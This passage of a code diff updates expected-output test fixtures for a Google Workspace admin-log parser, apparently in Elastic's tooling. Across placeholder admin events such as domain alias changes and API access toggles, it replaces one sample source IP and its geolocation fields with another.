-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ADD_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -552,26 +512,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4209,
+        "log.offset": 4199,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -592,7 +548,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -605,26 +561,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4627,
+        "log.offset": 4616,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -645,7 +597,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"SKIP_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -658,26 +610,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5048,
+        "log.offset": 5036,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -698,7 +646,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS_MX\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -711,26 +659,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5470,
+        "log.offset": 5457,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -751,7 +695,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"VERIFY_DOMAIN_ALIAS\",\"parameters\":[{\"name\":\"DOMAIN_ALIAS\",\"value\":\"alias\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"DOMAIN_VERIFICATION_METHOD\",\"value\":\"ANALYTICS\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -765,26 +709,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5894,
+        "log.offset": 5880,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -806,7 +746,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_OAUTH_ACCESS_TO_ALL_APIS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -819,26 +759,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6373,
+        "log.offset": 6358,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -860,7 +796,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_ALLOW_ADMIN_PASSWORD_RESET\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -873,26 +809,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6803,
+        "log.offset": 6787,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -914,7 +846,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_API_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"true\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -928,26 +860,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7235,
+        "log.offset": 7218,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -968,7 +896,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"AUTHORIZE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"},{\"name\":\"API_SCOPES\",\"multiValue\":[\"a\",\"b\"]}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -985,26 +913,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7687,
+        "log.offset": 7669,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1025,7 +949,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"REMOVE_API_CLIENT_ACCESS\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"API_CLIENT_NAME\",\"value\":\"api client\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1038,26 +962,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8169,
+        "log.offset": 8150,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1078,7 +998,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}",
         "event.provider": "admin",
         "event.type": [
             "change"
@@ -1092,26 +1012,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 8603,
+        "log.offset": 8583,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1132,7 +1048,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}",
